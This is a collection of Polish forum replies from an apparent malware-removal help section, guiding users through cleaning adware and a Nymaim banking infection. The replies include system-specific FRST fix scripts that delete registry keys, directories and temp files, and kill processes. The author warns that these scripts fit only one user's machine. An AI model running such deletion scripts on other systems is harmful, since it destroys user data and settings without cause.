Pinned\StartMenu\big_bang_empire.lnk DeleteKey: HKCU\Software\Doeye DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Doeye DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Karina\AppData\Local CMD: dir /a C:\Users\Karina\AppData\LocalLow CMD: dir /a C:\Users\Karina\AppData\Roaming EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok do kasacji modyfikacji infekcji. Czyszczenie wyłączy wszystkie rozszerzenia, więc po dezynfekcji włączysz je sobie ponownie. 4. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). doeye;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Wszystko prawidłowo wykonane. Wygląda na to, że infekcja ustąpiła (ale jeszcze się nigdzie nie logujesz), nie ustąpiły natomiast modyfikacje adware w Google Chrome i podejrzewam modyfikacje preferencji - zalecam kompleksową jej reinstalację. Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. Następnie poproszę o kolejny całościowy skan systemu za pomocą narzędzia Malwarebytes Anti-Malware. Dla wszystkich wyników zastosuj opcję Kwaranntany i dostarcz raport z tego działania. P.S: O wykrywalności na PW.

Raporty nie wykazują oznak jakiejkolwiek infekcji (nie ma z czego nawet zrobić kosmetyki systemowej). Temat przenoszę do działu Hardware, gdzie odbywać się będzie diagnostyka sprzętu. Dostarcz wymagane przez ten dział raporty, a już z zwłaszcza te dot. dysku, bo w Dzienniku Zdarzeń widzę jakieś dziwne zdarzenia z nim związane.

System jest zainfekowany przez infekcję bankową Nymaim (weryfikacja banku była reakcją prawidłową) - KLIK / KLIK. Dezynfekcja nie będzie prosta i nie wiem czy dokończę ją ja, bo za 3 godziny wyjeżdżam. Skontaktuje się w tej spawie z picasso. Po doprowadzeniu systemu do prawowitego stanu będzie wymagana obowiązkowa zmiana haseł we wszystkich serwisach logowania, czyli m.in skrzynka elektroniczna, usługi zakupów online, bank. Nie loguj się teraz do żadnych serwisów związanych z płatnością online i nie wymieniaj plików z innymi urządzeniami. P.S: Ewakuuj się z Windows XP na system posiadający wsparcie aktualizacji zabezpieczeń (Windows 7 / 8 / 10). Zaczynamy. 1. Detekcję AdwCleaner daj do kasacji. 2. Odinstaluj oprogramowanie sponsorskie (przypuszczalnie tą techniką zainstalowane): McAfee Security Scan Plus. 3. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe CreateRestorePoint: HKU\S-1-5-21-1390067357-764733703-1801674531-1003\...\Winlogon: [shell] C:\Documents and Settings\All Users\sound-1\sound-3.exe -29,explorer.exe Startup: C:\Documents and Settings\ja\Menu Start\Programy\Autostart\density-5.lnk [2017-04-11] ShortcutTarget: density-5.lnk -> C:\Documents and Settings\ja\Dane aplikacji\density-0\density-99.exe (Brak pliku) Startup: C:\Documents and Settings\ja\Menu Start\Programy\Autostart\MSQRY32.JSE [2017-03-22] () RemoveDirectory: C:\Documents and Settings\All Users\sound-1 RemoveDirectory: C:\Documents and Settings\ja\Dane aplikacji\density-0 C:\Documents and Settings\ja\Menu Start\Programy\Autostart\density-5.lnk C:\Documents and Settings\ja\Menu Start\Programy\Autostart\MSQRY32.JSE CHR HomePage: Default -> hxxp://search.babylon.com/?affID=110823&tt=120912_ccp_3812_5&babsrc=HP_ss&mntrId=805e72070000000000000013023f4ed0 CHR StartupUrls: Default -> "hxxps://www.google.pl/","hxxp://www.google.pl/","hxxp://www.tvn24.pl/","hxxp://otomoto.pl/","hxxp://www.searchqu.com/406" U2 CertPropSvc; Brak ImagePath U1 WS2IFSL; Brak ImagePath DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\ja\AppData\Local\Mozilla C:\Users\ja\AppData\Roaming\Mozilla C:\Users\ja\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Polecam zainstalować bloker reklam o podłożu nieinfekcyjnym, do tego celu przyda Ci się uBlock Origin. 5. Zastosuj skaner Kaspersky Virus Removal Tool (Ustawienia > Zaznacz pole System Drive), dla wszystkich wyników zastosuj opcję Kwarantanny. Przedstaw raport (opcja Report) z tego działania. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Jeśli dostarczysz nowe raporty (może być bez GMER) do godziny 16 to przez wyjazdem zdążę zabrać się za instrukcję. Wersja: 24-05-2017 Pamiętaj, aby użyć najnowszej wersji: KLIK.

Jeśli dostarczysz nowe raporty (może być bez GMER) do godziny 16 to przez wyjazdem zdążę zabrać się za instrukcję. Temat przedawnił się w takim stopniu, że najpierw muszę znowu zobaczyć na czym stoimy. Wersja: 14-05-2017 Pamiętaj, aby użyć najnowszej wersji: KLIK.

Jeśli dostarczysz nowe raporty (może być bez GMER) do godziny 16 to przez wyjazdem zdążę zabrać się za instrukcję. Wersja: 24-05-2017 Pamiętaj, aby użyć najnowszej wersji: KLIK.

W porządku. Poproszę teraz dodatkowo o raport CrystalDiskInfo oraz HDTune. Trzeba rozszerzyć diagnostykę dot. dysku.

OK, to czekam na rezultaty. Zapomniałem wcześniej dodać byś jednak został na razie na ustawieniach producenta, nie zmieniaj ich.

Raporty nie wykazują oznak infekcji. W spoilerze zadaję działania poboczne, bez związku z problemem. Administrator (S-1-5-21-3268135465-591020038-312475966-500 - Administrator - Disabled) => C:\Users\Administrator Asus (S-1-5-21-3268135465-591020038-312475966-1000 - Administrator - Enabled) => C:\Users\Asus Gość (S-1-5-21-3268135465-591020038-312475966-501 - Limited - Disabled) Szymon (S-1-5-21-3268135465-591020038-312475966-1015 - Limited - Enabled) => C:\Users\Szymon Nie widzę konta "Inny użytkownik", Administrator i Gość są wyłączone, ale konto Gość w tej chwili jest nieistotne.. Włącz wszystkie konta, oprócz Gościa i zobacz efekty. Jeśli nadal będzie problem wykonaj poniższe kroki. Uruchom SystemLook i w oknie wklej: :reg HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList /s HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts /s Następnie kliknij w Look. Momentalnie wyskoczy okno z raportem - dostarcz go.